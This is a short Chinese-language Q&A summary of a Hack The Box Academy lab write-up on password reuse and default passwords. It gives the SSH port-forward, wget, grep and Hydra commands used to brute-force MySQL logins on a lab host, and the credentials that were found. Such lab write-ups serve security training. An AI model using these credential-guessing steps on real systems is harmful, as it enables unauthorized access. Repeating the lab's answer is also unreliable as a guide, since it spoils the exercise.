HTB学院:密码攻击模块——密码重用/默认密码
原文英文,约300词,阅读约需1分钟。
📝
内容提要
任务是使用先前发现的用户凭据找到MySQL凭据。通过建立SSH隧道将MySQL端口转发到本地机器,然后下载默认凭据备忘单并筛选出MySQL凭据。最后使用Hydra暴力破解登录成功找到有效的MySQL凭据。
❓
Q&A
如何使用SSH隧道转发MySQL端口?
使用命令ssh -L 4444:localhost:3306 sam@10.129.xx.xxx建立SSH隧道,将MySQL端口转发到本地机器。
下载默认凭据备忘单的命令是什么?
使用命令wget https://raw.githubusercontent.com/ihebski/DefaultCreds-cheat-sheet/main/DefaultCreds-Cheat-Sheet.csv下载默认凭据备忘单。
如何从备忘单中筛选MySQL凭据?
使用命令cat DefaultCreds-Cheat-Sheet.csv | grep -i 'mysql'将MySQL特定的凭据筛选出来并保存到cred.list文件中。
如何使用Hydra进行暴力破解登录?
使用命令hydra -C cred.list mysql://localhost:4444来自动尝试凭据进行暴力破解登录。
成功找到的MySQL凭据是什么?
成功找到的MySQL凭据是用户名superdba,密码admin。
在这个任务中,使用了哪些工具?
在这个任务中使用了SSH、wget、grep和Hydra等工具。
🏷️